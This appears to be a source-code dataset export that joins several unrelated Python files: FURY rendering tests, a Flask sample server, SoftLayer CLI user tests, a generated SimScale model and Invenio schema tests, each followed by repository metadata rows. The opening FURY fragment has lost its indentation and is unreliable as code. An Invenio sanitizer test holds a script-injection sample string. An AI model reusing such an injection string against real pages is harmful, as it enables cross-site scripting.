npt.assert_(issubclass(w[-1].category, DeprecationWarning))
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always", DeprecationWarning)
scene = window.renderer(background=(0.0, 1.0, 0.0))
npt.assert_equal(scene.size(), (0, 0))
npt.assert_equal(len(w), 1)
npt.assert_(issubclass(w[-1].category, DeprecationWarning))
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always", DeprecationWarning)
scene = window.ren()
npt.assert_equal(scene.size(), (0, 0))
npt.assert_equal(len(w), 2)
npt.assert_(issubclass(w[-1].category, DeprecationWarning))
scene = window.Scene()
with warnings.catch_warnings(record=True) as l_warn:
warnings.simplefilter("always", DeprecationWarning)
obj = actor.axes(scale=(1, 1, 1))
window.add(scene, obj)
arr = window.snapshot(scene)
report = window.analyze_snapshot(arr)
npt.assert_equal(report.objects, 3)
window.rm(scene, obj)
arr = window.snapshot(scene)
report = window.analyze_snapshot(arr)
npt.assert_equal(report.objects, 0)
window.add(scene, obj)
window.rm_all(scene)
arr = window.snapshot(scene)
report = window.analyze_snapshot(arr)
npt.assert_equal(report.objects, 0)
window.add(scene, obj)
window.clear(scene)
report = window.analyze_renderer(scene)
npt.assert_equal(report.actors, 0)
deprecated_warns = [w for w in l_warn
if issubclass(w.category,
DeprecationWarning)]
npt.assert_equal(len(deprecated_warns), 7)
npt.assert_(issubclass(l_warn[-1].category, DeprecationWarning))
def test_active_camera():
scene = window.Scene()
scene.add(actor.axes(scale=(1, 1, 1)))
scene.reset_camera()
scene.reset_clipping_range()
direction = scene.camera_direction()
position, focal_point, view_up = scene.get_camera()
scene.set_camera((0., 0., 1.), (0., 0., 0), view_up)
position, focal_point, view_up = scene.get_camera()
npt.assert_almost_equal(np.dot(direction, position), -1)
scene.zoom(1.5)
new_position, _, _ = scene.get_camera()
npt.assert_array_almost_equal(position, new_position)
scene.zoom(1)
# rotate around focal point
scene.azimuth(90)
position, _, _ = scene.get_camera()
npt.assert_almost_equal(position, (1.0, 0.0, 0))
arr = window.snapshot(scene)
report = window.analyze_snapshot(arr, colors=[(255, 0, 0)])
npt.assert_equal(report.colors_found, [True])
# rotate around camera's center
scene.yaw(90)
arr = window.snapshot(scene)
report = window.analyze_snapshot(arr, colors=[(0, 0, 0)])
npt.assert_equal(report.colors_found, [True])
scene.yaw(-90)
scene.elevation(90)
arr = window.snapshot(scene)
report = window.analyze_snapshot(arr, colors=(0, 255, 0))
npt.assert_equal(report.colors_found, [True])
scene.set_camera((0., 0., 1.), (0., 0., 0), view_up)
# vertical rotation of the camera around the focal point
scene.pitch(10)
scene.pitch(-10)
# rotate around the direction of projection
scene.roll(90)
# inverted normalized distance from focal point along the direction
# of the camera
position, _, _ = scene.get_camera()
scene.dolly(0.5)
new_position, focal_point, view_up = scene.get_camera()
npt.assert_almost_equal(position[2], 0.5 * new_position[2])
cam = scene.camera()
npt. assert_equal(new_position, cam.GetPosition())
npt. assert_equal(focal_point, cam.GetFocalPoint())
npt. assert_equal(view_up, cam.GetViewUp())
def test_parallel_projection():
scene = window.Scene()
axes = actor.axes()
axes2 = actor.axes()
axes2.SetPosition((2, 0, 0))
# Add both axes.
scene.add(axes, axes2)
# Put the camera on a angle so that the
# camera can show the difference between perspective
# and parallel projection
scene.set_camera((1.5, 1.5, 1.5))
scene.GetActiveCamera().Zoom(2)
# window.show(scene, reset_camera=True)
scene.reset_camera()
arr = window.snapshot(scene)
scene.projection('parallel')
# window.show(scene, reset_camera=False)
arr2 = window.snapshot(scene)
# Because of the parallel projection the two axes
# will have the same size and therefore occupy more
# pixels rather than in perspective projection were
# the axes being further will be smaller.
npt.assert_equal(np.sum(arr2 > 0) > np.sum(arr > 0), True)
scene.projection('perspective')
arr2 = window.snapshot(scene)
npt.assert_equal(np.sum(arr2 > 0), np.sum(arr > 0))
@pytest.mark.skipif(skip_osx or skip_win, reason="This test does not work on"
" Windows and OSX. Need to "
" be introspected")
def test_order_transparent():
scene = window.Scene()
lines = [np.array([[1, 0, 1.], [-1, 0, 1.]]),
np.array([[1, 0, -1.], [-1, 0, -1.]])]
colors = np.array([[1., 0., 0.], [0., 1., 0.]])
stream_actor = actor.streamtube(lines, colors, linewidth=0.3, opacity=0.5)
scene.add(stream_actor)
scene.reset_camera()
scene.reset_clipping_range()
arr = window.snapshot(scene, fname='green_front.png',
offscreen=True, order_transparent=False)
green_no_ot = arr[150, 150, 1]
arr = window.snapshot(scene, fname='red_front.png',
offscreen=True, order_transparent=True)
# when order transparency is True green should be weaker
green_ot = arr[150, 150, 1]
npt.assert_equal(green_no_ot > green_ot, True)
@pytest.mark.skipif(skip_win, reason="This test does not work on Windows."
" Need to be introspected")
def test_stereo():
scene = window.Scene()
lines = [np.array([[-1, 0, 0.], [1, 0, 0.]]),
np.array([[-1, 1, 0.], [1, 1, 0.]])]
colors = np.array([[1., 0., 0.], [0., 1., 0.]])
stream_actor = actor.streamtube(lines, colors, linewidth=0.3, opacity=0.5)
scene.add(stream_actor)
# green in front
scene.elevation(90)
scene.camera().OrthogonalizeViewUp()
scene.reset_clipping_range()
scene.reset_camera()
mono = window.snapshot(scene, fname='stereo_off.png', offscreen=True,
size=(300, 300), order_transparent=True,
stereo='off')
with npt.assert_warns(UserWarning):
stereo = window.snapshot(scene, fname='stereo_horizontal.png',
offscreen=True, size=(300, 300),
order_transparent=True, stereo='On')
# mono render should have values in the center
# horizontal split stereo render should be empty in the center
npt.assert_raises(AssertionError, npt.assert_array_equal,
mono[150, 150], [0, 0, 0])
npt.assert_array_equal(stereo[150, 150], [0, 0, 0])
def test_record():
xyzr = np.array([[0, 0, 0, 10], [100, 0, 0, 25], [200, 0, 0, 50]])
colors = np.array([[1, 0, 0, 1], [0, 1, 0, 1], [0, 0, 1., 1]])
sphere_actor = actor.sphere(centers=xyzr[:, :3], colors=colors[:],
radii=xyzr[:, 3])
scene = window.Scene()
scene.add(sphere_actor)
def test_content(filename='fury.png', colors_found=(True, True)):
npt.assert_equal(os.path.isfile(filename), True)
arr = io.load_image(filename)
report = window.analyze_snapshot(arr, colors=[(0, 255, 0),
(255, 0, 0)])
npt.assert_equal(report.objects, 3)
npt.assert_equal(report.colors_found, colors_found)
return arr
# Basic test
with InTemporaryDirectory():
window.record(scene)
test_content()
# test out_path and path_numbering, n_frame
with InTemporaryDirectory():
filename = "tmp_snapshot.png"
window.record(scene, out_path=filename)
test_content(filename)
window.record(scene, out_path=filename, path_numbering=True)
test_content(filename + "000000.png")
window.record(scene, out_path=filename, path_numbering=True,
n_frames=3)
test_content(filename + "000000.png")
test_content(filename + "000001.png")
test_content(filename + "000002.png")
npt.assert_equal(os.path.isfile(filename + "000003.png"), False)
# test verbose
with captured_output() as (out, _):
window.record(scene, verbose=True)
npt.assert_equal(out.getvalue().strip(),
"Camera Position (315.14, 0.00, 536.43)\n"
"Camera Focal Point (119.89, 0.00, 0.00)\n"
"Camera View Up (0.00, 1.00, 0.00)")
# test camera option
with InTemporaryDirectory():
window.record(scene, cam_pos=(310, 0, 530), cam_focal=(120, 0, 0),
cam_view=(0, 0, 1))
test_content()
# test size and clipping
# Skip it on Mac mainly due to offscreen case on Travis. It works well
# with a display. Need to check if screen_clip works. Need to check if
# ReadFrontBufferOff(), ShouldRerenderOn() could improved this OSX case.
if not skip_osx:
with InTemporaryDirectory():
window.record(scene, out_path='fury_1.png', size=(1000, 1000),
magnification=5)
npt.assert_equal(os.path.isfile('fury_1.png'), True)
arr = io.load_image('fury_1.png')
npt.assert_equal(arr.shape, (5000, 5000, 3))
window.record(scene, out_path='fury_2.png', size=(5000, 5000),
screen_clip=True)
npt.assert_equal(os.path.isfile('fury_2.png'), True)
arr = io.load_image('fury_2.png')
assert_less_equal(arr.shape[0], 5000)
assert_less_equal(arr.shape[1], 5000)
| 34.182306 | 78 | 0.618824 |
79554fb2b2825f2322030678e1bfd41d2715c71e | 2,643 | py | Python | cloud/applications/cars-4-you/server.py | LaudateCorpus1/watson-machine-learning-samples | 2eef2d00844db9bee7c20d74503e172e5683a313 | [
"Apache-2.0"
] | 27 | 2020-09-09T20:46:03.000Z | 2021-11-29T20:13:35.000Z | cloud/applications/cars-4-you/server.py | LaudateCorpus1/watson-machine-learning-samples | 2eef2d00844db9bee7c20d74503e172e5683a313 | [
"Apache-2.0"
] | 6 | 2020-09-21T12:50:05.000Z | 2021-01-09T14:06:41.000Z | cloud/applications/cars-4-you/server.py | LaudateCorpus1/watson-machine-learning-samples | 2eef2d00844db9bee7c20d74503e172e5683a313 | [
"Apache-2.0"
] | 55 | 2020-09-14T12:38:44.000Z | 2022-03-18T13:28:34.000Z | import os
from flask import Flask, send_from_directory, request, jsonify, logging
from wml_utils import WMLHelper
from nlu_utils import NLUUtils
from get_details import get_wml_details, get_cos_details, get_details
app = Flask(__name__, static_url_path='/static')
wml_details = get_wml_details()
wml_client = WMLHelper(wml_details)
@app.route('/')
def root():
return app.send_static_file('index.html')
@app.route('/stylesheets/<path:path>')
def send_styles(path):
return send_from_directory('static/stylesheets', path)
@app.route('/scripts/<path:path>')
def send_js(path):
return send_from_directory('static/scripts', path)
@app.route('/staticImages/<path:path>')
def send_img(path):
return send_from_directory('static/images', path)
@app.route('/analyze/area', methods=['POST'])
def anayze_area():
payload = request.get_json(force=True)
app.logger.debug("Area request: {}".format(payload))
try:
response = wml_client.analyze_business_area(payload)
return jsonify(response), 200
except Exception as e:
return str(e), 500
@app.route('/analyze/satisfaction', methods=['POST'])
def analyze_satisfaction():
comment = request.get_data().decode('utf-8')
app.logger.debug("Comment to analyze: {}".format(comment))
try:
satisfaction = wml_client.analyze_satisfaction(comment)
app.logger.debug("Predicted satisfaction: {}".format(satisfaction))
return satisfaction
except Exception as e:
return str(e), 500
@app.route('/functions/satisfaction', methods=['GET'])
def functions_satisfaction():
deployment_array = wml_client.get_function_deployments(keyword="satisfaction")
app.logger.debug("Satisfaction functions: {}".format(deployment_array))
response = {
"deployments": deployment_array
}
return jsonify(response)
@app.route('/functions/area', methods=['GET'])
def functions_area():
deployment_array = wml_client.get_function_deployments(keyword="area")
app.logger.debug("Area functions: {}".format(deployment_array))
response = {
"deployments": deployment_array
}
return jsonify(response)
@app.route('/functions', methods=['POST'])
def functions():
models = request.get_json(force=True)
app.logger.info("Request to anayze: ")
app.logger.info(models)
try:
wml_client.update_scoring_functions(deployments=models)
return jsonify("ok"), 200
except Exception as e:
app.logger.info(str(e))
return jsonify(str(e)), 500
port = os.getenv('PORT', '5000')
if __name__ == "__main__":
app.run(host='0.0.0.0', port=int(port))
| 28.728261 | 82 | 0.701854 |
79554fc85ca958660bbd860f5d711cb9eea35128 | 12,510 | py | Python | tests/CLI/modules/user_tests.py | acamacho82/softlayer-python | 8a755be00dcb86abc20fcc4b4f69e3155ba187e8 | [
"MIT"
] | 2 | 2016-07-06T15:31:48.000Z | 2016-07-06T15:40:25.000Z | tests/CLI/modules/user_tests.py | acamacho82/softlayer-python | 8a755be00dcb86abc20fcc4b4f69e3155ba187e8 | [
"MIT"
] | 73 | 2016-07-05T15:17:51.000Z | 2016-08-18T18:16:29.000Z | tests/CLI/modules/user_tests.py | kyubifire/softlayer-python | bee36eec73474a8b6a1813fbbcc0512f81bf1779 | [
"MIT"
] | 1 | 2019-07-22T05:20:39.000Z | 2019-07-22T05:20:39.000Z | """
SoftLayer.tests.CLI.modules.user_tests
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Tests for the user cli command
"""
import json
import sys
import mock
import testtools
from SoftLayer import testing
class UserCLITests(testing.TestCase):
"""User list tests"""
def test_user_list(self):
result = self.run_command(['user', 'list'])
self.assert_no_fail(result)
self.assert_called_with('SoftLayer_Account', 'getUsers')
def test_user_list_only_id(self):
result = self.run_command(['user', 'list', '--columns=id'])
self.assert_no_fail(result)
self.assertEqual([{"id": 11100}, {"id": 11111}], json.loads(result.output))
"""User detail tests"""
def test_detail(self):
result = self.run_command(['user', 'detail', '11100'])
self.assert_no_fail(result)
self.assert_called_with('SoftLayer_User_Customer', 'getObject')
def test_detail_keys(self):
result = self.run_command(['user', 'detail', '11100', '-k'])
self.assert_no_fail(result)
self.assertIn('APIKEY', result.output)
def test_detail_permissions(self):
result = self.run_command(['user', 'detail', '11100', '-p'])
self.assert_no_fail(result)
self.assert_called_with('SoftLayer_User_Customer', 'getPermissions')
self.assertIn('ACCESS_ALL_HARDWARE', result.output)
def test_detail_hardware(self):
result = self.run_command(['user', 'detail', '11100', '-h'])
self.assert_no_fail(result)
self.assert_called_with(
'SoftLayer_User_Customer', 'getObject', identifier=11100,
mask='mask[id, hardware, dedicatedHosts]'
)
def test_detail_virtual(self):
result = self.run_command(['user', 'detail', '11100', '-v'])
self.assert_no_fail(result)
self.assert_called_with(
'SoftLayer_User_Customer', 'getObject', identifier=11100,
mask='mask[id, virtualGuests]'
)
def test_detail_logins(self):
result = self.run_command(['user', 'detail', '11100', '-l'])
self.assert_no_fail(result)
self.assert_called_with(
'SoftLayer_User_Customer', 'getLoginAttempts', identifier=11100
)
def test_detail_events(self):
result = self.run_command(['user', 'detail', '11100', '-e'])
self.assert_no_fail(result)
self.assert_called_with('SoftLayer_Event_Log', 'getAllObjects')
def test_print_hardware_access(self):
mock = self.set_mock('SoftLayer_User_Customer', 'getObject')
mock.return_value = {
'accountId': 12345,
'address1': '315 Test Street',
'city': 'Houston',
'companyName': 'SoftLayer Development Community',
'country': 'US',
'displayName': 'Test',
'email': 'test@us.ibm.com',
'firstName': 'Test',
'id': 244956,
'lastName': 'Testerson',
'postalCode': '77002',
'state': 'TX',
'statusDate': None,
'hardware': [
{'id': 1234,
'fullyQualifiedDomainName': 'test.test.test',
'provisionDate': '2018-05-08T15:28:32-06:00',
'primaryBackendIpAddress': '175.125.126.118',
'primaryIpAddress': '175.125.126.118'}
],
'dedicatedHosts': [
{'id': 1234,
'fullyQualifiedDomainName': 'test.test.test',
'provisionDate': '2018-05-08T15:28:32-06:00',
'primaryBackendIpAddress': '175.125.126.118',
'primaryIpAddress': '175.125.126.118'}
],
}
result = self.run_command(['user', 'detail', '11100', '-h'])
self.assert_no_fail(result)
self.assert_called_with('SoftLayer_User_Customer', 'getObject', identifier=11100,
mask="mask[id, hardware, dedicatedHosts]")
"""User permissions tests"""
def test_permissions_list(self):
result = self.run_command(['user', 'permissions', '11100'])
self.assert_no_fail(result)
self.assert_called_with('SoftLayer_User_Customer_CustomerPermission_Permission', 'getAllObjects')
self.assert_called_with(
'SoftLayer_User_Customer', 'getObject', identifier=11100,
mask='mask[id, permissions, isMasterUserFlag, roles]'
)
"""User edit-permissions tests"""
def test_edit_perms_on(self):
result = self.run_command(['user', 'edit-permissions', '11100', '--enable', '-p', 'TEST'])
self.assert_no_fail(result)
self.assert_called_with('SoftLayer_User_Customer', 'addBulkPortalPermission', identifier=11100)
def test_edit_perms_on_bad(self):
result = self.run_command(['user', 'edit-permissions', '11100', '--enable', '-p', 'TEST_NOt_exist'])
self.assertEqual(result.exit_code, 1)
def test_edit_perms_off(self):
result = self.run_command(['user', 'edit-permissions', '11100', '--disable', '-p', 'TEST'])
self.assert_no_fail(result)
self.assert_called_with('SoftLayer_User_Customer', 'removeBulkPortalPermission', identifier=11100)
@mock.patch('SoftLayer.CLI.user.edit_permissions.click')
def test_edit_perms_off_failure(self, click):
permission_mock = self.set_mock('SoftLayer_User_Customer', 'removeBulkPortalPermission')
permission_mock.return_value = False
result = self.run_command(['user', 'edit-permissions', '11100', '--disable', '-p', 'TEST'])
click.secho.assert_called_with('Failed to update permissions: TEST', fg='red')
self.assert_no_fail(result)
self.assert_called_with('SoftLayer_User_Customer', 'removeBulkPortalPermission', identifier=11100)
def test_edit_perms_from_user(self):
result = self.run_command(['user', 'edit-permissions', '11100', '-u', '1234'])
self.assert_no_fail(result)
self.assert_called_with('SoftLayer_User_Customer', 'getPermissions', identifier=1234)
self.assert_called_with('SoftLayer_User_Customer', 'removeBulkPortalPermission', identifier=11100)
self.assert_called_with('SoftLayer_User_Customer', 'addBulkPortalPermission', identifier=11100)
"""User create tests"""
@mock.patch('SoftLayer.CLI.formatting.confirm')
def test_create_user(self, confirm_mock):
confirm_mock.return_value = True
result = self.run_command(['user', 'create', 'test', '-e', 'test@us.ibm.com', '-p', 'testword'])
self.assert_no_fail(result)
self.assertIn('test@us.ibm.com', result.output)
self.assert_called_with('SoftLayer_Account', 'getCurrentUser')
self.assert_called_with('SoftLayer_User_Customer', 'createObject', args=mock.ANY)
@mock.patch('SoftLayer.CLI.formatting.confirm')
def test_create_user_no_confirm(self, confirm_mock):
confirm_mock.return_value = False
result = self.run_command(['user', 'create', 'test', '-e', 'test@us.ibm.com', '-p', 'testword'])
self.assertEqual(result.exit_code, 2)
@testtools.skipIf(sys.version_info < (3, 6), "Secrets module only exists in version 3.6+")
@mock.patch('secrets.choice')
@mock.patch('SoftLayer.CLI.formatting.confirm')
def test_create_user_generate_password_36(self, confirm_mock, secrets):
secrets.return_value = 'Q'
confirm_mock.return_value = True
result = self.run_command(['user', 'create', 'test', '-e', 'test@us.ibm.com', '-p', 'generate'])
self.assert_no_fail(result)
self.assertIn('test@us.ibm.com', result.output)
self.assertIn('QQQQQQQQQQQQQQQQQQQQQQ', result.output)
self.assert_called_with('SoftLayer_Account', 'getCurrentUser')
self.assert_called_with('SoftLayer_User_Customer', 'createObject', args=mock.ANY)
@mock.patch('SoftLayer.CLI.formatting.confirm')
def test_create_user_generate_password_2(self, confirm_mock):
if sys.version_info >= (3, 6):
self.skipTest("Python needs to be < 3.6 for this test.")
confirm_mock.return_value = True
result = self.run_command(['user', 'create', 'test', '-e', 'test@us.ibm.com', '-p', 'generate'])
self.assertIn(result.output, "ImportError")
@mock.patch('SoftLayer.CLI.formatting.confirm')
def test_create_user_and_apikey(self, confirm_mock):
confirm_mock.return_value = True
result = self.run_command(['user', 'create', 'test', '-e', 'test@us.ibm.com', '-a'])
self.assert_no_fail(result)
self.assert_called_with('SoftLayer_User_Customer', 'addApiAuthenticationKey')
@mock.patch('SoftLayer.CLI.formatting.confirm')
def test_create_user_with_template(self, confirm_mock):
confirm_mock.return_value = True
result = self.run_command(['user', 'create', 'test', '-e', 'test@us.ibm.com',
'-t', '{"firstName": "Supermand"}'])
self.assertIn('Supermand', result.output)
@mock.patch('SoftLayer.CLI.formatting.confirm')
def test_create_user_with_bad_template(self, confirm_mock):
confirm_mock.return_value = True
result = self.run_command(['user', 'create', 'test', '-e', 'test@us.ibm.com',
'-t', '{firstName: "Supermand"}'])
self.assertIn("Argument Error", result.exception.message)
self.assertEqual(result.exit_code, 2)
@mock.patch('SoftLayer.CLI.formatting.confirm')
def test_create_user_with_no_confirm(self, confirm_mock):
confirm_mock.return_value = False
result = self.run_command(['user', 'create', 'test', '-e', 'test@us.ibm.com'])
self.assertIn("Canceling creation!", result.exception.message)
self.assertEqual(result.exit_code, 2)
@mock.patch('SoftLayer.CLI.formatting.confirm')
def test_create_user_from_user(self, confirm_mock):
confirm_mock.return_value = True
result = self.run_command(['user', 'create', 'test', '-e', 'test@us.ibm.com', '-u', '1234'])
self.assert_no_fail(result)
self.assert_called_with('SoftLayer_User_Customer', 'getObject', identifier=1234)
"""User edit-details tests"""
@mock.patch('SoftLayer.CLI.user.edit_details.click')
def test_edit_details(self, click):
result = self.run_command(['user', 'edit-details', '1234', '-t', '{"firstName":"Supermand"}'])
click.secho.assert_called_with('1234 updated successfully', fg='green')
self.assert_no_fail(result)
self.assert_called_with('SoftLayer_User_Customer', 'editObject',
args=({'firstName': 'Supermand'},), identifier=1234)
@mock.patch('SoftLayer.CLI.user.edit_details.click')
def test_edit_details_failure(self, click):
mock = self.set_mock('SoftLayer_User_Customer', 'editObject')
mock.return_value = False
result = self.run_command(['user', 'edit-details', '1234', '-t', '{"firstName":"Supermand"}'])
click.secho.assert_called_with('Failed to update 1234', fg='red')
self.assert_no_fail(result)
self.assert_called_with('SoftLayer_User_Customer', 'editObject',
args=({'firstName': 'Supermand'},), identifier=1234)
def test_edit_details_bad_json(self):
result = self.run_command(['user', 'edit-details', '1234', '-t', '{firstName:"Supermand"}'])
self.assertIn("Argument Error", result.exception.message)
self.assertEqual(result.exit_code, 2)
"""User delete tests"""
@mock.patch('SoftLayer.CLI.user.delete.click')
def test_delete(self, click):
result = self.run_command(['user', 'delete', '12345'])
click.secho.assert_called_with('12345 deleted successfully', fg='green')
self.assert_no_fail(result)
self.assert_called_with('SoftLayer_User_Customer', 'editObject',
args=({'userStatusId': 1021},), identifier=12345)
@mock.patch('SoftLayer.CLI.user.delete.click')
def test_delete_failure(self, click):
mock = self.set_mock('SoftLayer_User_Customer', 'editObject')
mock.return_value = False
result = self.run_command(['user', 'delete', '12345'])
click.secho.assert_called_with('Failed to delete 12345', fg='red')
self.assert_no_fail(result)
self.assert_called_with('SoftLayer_User_Customer', 'editObject',
args=({'userStatusId': 1021},), identifier=12345)
| 45.992647 | 108 | 0.639648 |
79555079ca5ffd97d65c0c8f0eea2dc09b80eead | 4,565 | py | Python | simscale_sdk/models/dimensional_function_acceleration.py | slainesimscale/simscale-python-sdk | db483eeabe558e55d020f5f829a3bf13c9c287a7 | [
"MIT"
] | 8 | 2021-01-22T13:41:03.000Z | 2022-01-03T09:00:10.000Z | simscale_sdk/models/dimensional_function_acceleration.py | slainesimscale/simscale-python-sdk | db483eeabe558e55d020f5f829a3bf13c9c287a7 | [
"MIT"
] | null | null | null | simscale_sdk/models/dimensional_function_acceleration.py | slainesimscale/simscale-python-sdk | db483eeabe558e55d020f5f829a3bf13c9c287a7 | [
"MIT"
] | 3 | 2021-03-18T15:52:52.000Z | 2022-01-03T08:59:30.000Z | # coding: utf-8
"""
SimScale API
The version of the OpenAPI document: 0.0.0
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from simscale_sdk.configuration import Configuration
class DimensionalFunctionAcceleration(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'value': 'OneOfDimensionalFunctionAccelerationValue',
'unit': 'str'
}
attribute_map = {
'value': 'value',
'unit': 'unit'
}
def __init__(self, value=None, unit=None, local_vars_configuration=None): # noqa: E501
"""DimensionalFunctionAcceleration - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._value = None
self._unit = None
self.discriminator = None
if value is not None:
self.value = value
self.unit = unit
@property
def value(self):
"""Gets the value of this DimensionalFunctionAcceleration. # noqa: E501
:return: The value of this DimensionalFunctionAcceleration. # noqa: E501
:rtype: OneOfDimensionalFunctionAccelerationValue
"""
return self._value
@value.setter
def value(self, value):
"""Sets the value of this DimensionalFunctionAcceleration.
:param value: The value of this DimensionalFunctionAcceleration. # noqa: E501
:type: OneOfDimensionalFunctionAccelerationValue
"""
self._value = value
@property
def unit(self):
"""Gets the unit of this DimensionalFunctionAcceleration. # noqa: E501
:return: The unit of this DimensionalFunctionAcceleration. # noqa: E501
:rtype: str
"""
return self._unit
@unit.setter
def unit(self, unit):
"""Sets the unit of this DimensionalFunctionAcceleration.
:param unit: The unit of this DimensionalFunctionAcceleration. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and unit is None: # noqa: E501
raise ValueError("Invalid value for `unit`, must not be `None`") # noqa: E501
allowed_values = ["m/s²", "in/s²"] # noqa: E501
if self.local_vars_configuration.client_side_validation and unit not in allowed_values: # noqa: E501
raise ValueError(
"Invalid value for `unit` ({0}), must be one of {1}" # noqa: E501
.format(unit, allowed_values)
)
self._unit = unit
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, DimensionalFunctionAcceleration):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, DimensionalFunctionAcceleration):
return True
return self.to_dict() != other.to_dict()
| 30.032895 | 109 | 0.594743 |
795551b900d78f471b67f0886aa86c21a508e044 | 5,584 | py | Python | tests/test_custom_fields.py | NRodriguezcuellar/invenio-records-rest | c4a3717afcf9b08b6e42f3529addecc64bb2e47c | [
"MIT"
] | 5 | 2017-10-22T00:13:49.000Z | 2019-10-04T11:35:18.000Z | tests/test_custom_fields.py | NRodriguezcuellar/invenio-records-rest | c4a3717afcf9b08b6e42f3529addecc64bb2e47c | [
"MIT"
] | 221 | 2015-10-30T23:27:52.000Z | 2022-03-07T13:17:55.000Z | tests/test_custom_fields.py | NRodriguezcuellar/invenio-records-rest | c4a3717afcf9b08b6e42f3529addecc64bb2e47c | [
"MIT"
] | 60 | 2015-10-30T22:43:27.000Z | 2022-02-10T10:08:08.000Z | # -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2016-2018 CERN.
#
# Invenio is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Invenio custom schema fields tests."""
import pytest
from invenio_pidstore.models import PersistentIdentifier as PIDModel
from invenio_records import Record
from invenio_rest.serializer import BaseSchema as Schema
from marshmallow import __version_info__ as marshmallow_version
from marshmallow import missing
from invenio_records_rest.schemas import StrictKeysMixin
from invenio_records_rest.schemas.fields import DateString, GenFunction, \
GenMethod, PersistentIdentifier, SanitizedHTML, SanitizedUnicode, \
TrimmedString
if marshmallow_version[0] >= 3:
schema_to_use = Schema
from marshmallow import EXCLUDE
else:
schema_to_use = StrictKeysMixin
class CustomFieldSchema(schema_to_use):
"""Test schema."""
if marshmallow_version[0] >= 3:
class Meta:
"""."""
unknown = EXCLUDE
date_string_field = DateString(attribute='date_string_field')
sanitized_html_field = SanitizedHTML(attribute='sanitized_html_field')
sanitized_unicode_field = SanitizedUnicode(
attribute='sanitized_unicode_field')
trimmed_string_field = TrimmedString(
attribute='trimmed_string_field')
gen_function_field = GenFunction(
lambda o: 'serialize_gen_function_field',
lambda o: 'deserialize_gen_function_field',
)
gen_method_field = GenMethod(
'serialize_gen_method_field',
'deserialize_gen_method_field')
persistent_identifier_field = PersistentIdentifier()
def serialize_gen_method_field(self, obj):
"""Serialize a value for the GenMethod field."""
return 'serialize_gen_method_field'
def deserialize_gen_method_field(self, value):
"""Deserialize a value for the GenMethod field."""
return 'deserialize_gen_method_field'
def test_load_custom_fields(app):
"""Test loading of custom fields."""
rec = Record({'date_string_field': '1999-10-27',
'sanitized_html_field': 'an <script>evil()</script> example',
# Zero-width space, Line Tabulation, Escape, Cancel
'sanitized_unicode_field': u'\u200b\u000b\u001b\u0018',
'trimmed_string_field': 'so much trailing whitespace '})
recid = PIDModel(pid_type='recid', pid_value='12345')
loaded_data = CustomFieldSchema(context={'pid': recid}).load(rec).data
if 'metadata' in loaded_data:
values = loaded_data['metadata'].values()
else:
values = loaded_data.values()
assert set(values) == \
set(['1999-10-27', 'so much trailing whitespace',
'an evil() example', u'', '12345',
'deserialize_gen_method_field', 'deserialize_gen_function_field'])
def test_custom_generated_fields():
"""Test fields.generated fields."""
def serialize_func(obj, ctx):
return ctx.get('func-foo', obj.get('func-bar', missing))
def deserialize_func(value, ctx, data):
return ctx.get('func-foo', data.get('func-bar', missing))
class GeneratedFieldsSchema(schema_to_use):
"""Test schema."""
if marshmallow_version[0] >= 3:
class Meta:
"""Meta attributes for the schema."""
unknown = EXCLUDE
gen_function = GenFunction(
serialize=serialize_func,
deserialize=deserialize_func,
)
gen_method = GenMethod(
serialize='_serialize_gen_method',
deserialize='_desererialize_gen_method',
missing='raises-warning',
)
def _serialize_gen_method(self, obj):
# "meth-foo" from context or "meth-bar" from the object
return self.context.get(
'meth-foo', obj.get('meth-bar', missing))
def _desererialize_gen_method(self, value, data):
# "meth-foo" from context or "meth-bar" from the data
return self.context.get(
'meth-foo', data.get('meth-bar', missing))
ctx = {
'func-foo': 'ctx-func-value',
'meth-foo': 'ctx-meth-value',
}
data = {
'func-bar': 'data-func-value',
'meth-bar': 'data-meth-value',
'gen_function': 'original-func-value',
'gen_method': 'original-meth-value',
}
# No context, no data
assert GeneratedFieldsSchema().load({}).data == {}
assert GeneratedFieldsSchema().dump({}).data == {}
# Only context
assert GeneratedFieldsSchema(context=ctx).load({}).data == {
'gen_function': 'ctx-func-value',
'gen_method': 'ctx-meth-value',
}
assert GeneratedFieldsSchema(context=ctx).dump({}).data == {
'gen_function': 'ctx-func-value',
'gen_method': 'ctx-meth-value',
}
# Only data
assert GeneratedFieldsSchema().load(data).data == {
'gen_function': 'data-func-value',
'gen_method': 'data-meth-value',
}
assert GeneratedFieldsSchema().dump(data).data == {
'gen_function': 'data-func-value',
'gen_method': 'data-meth-value',
}
# Context and data
assert GeneratedFieldsSchema(context=ctx).load(data).data == {
'gen_function': 'ctx-func-value',
'gen_method': 'ctx-meth-value',
}
assert GeneratedFieldsSchema(context=ctx).dump(data).data == {
'gen_function': 'ctx-func-value',
'gen_method': 'ctx-meth-value',
}
| 33.437126 | 79 | 0.645774 |
